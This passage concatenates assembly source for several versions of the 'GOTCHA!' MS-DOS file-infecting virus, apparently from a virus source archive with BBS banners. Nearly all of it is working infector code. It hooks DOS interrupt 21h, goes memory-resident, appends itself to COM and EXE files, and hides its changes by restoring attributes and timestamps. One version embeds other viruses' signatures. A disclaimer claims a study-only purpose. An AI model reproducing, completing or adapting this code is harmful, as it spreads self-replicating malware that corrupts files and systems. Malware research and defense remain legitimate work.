sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mcý',0
signature: db 'GOTCHA!',0 ;I have got you! :-)
oi21:
end:
cseg ends
end begin
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha4.asm
+397
View File
@@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha9.asm
+576
View File
@@ -0,0 +1,576 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha9e.asm
+571
View File
@@ -0,0 +1,571 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
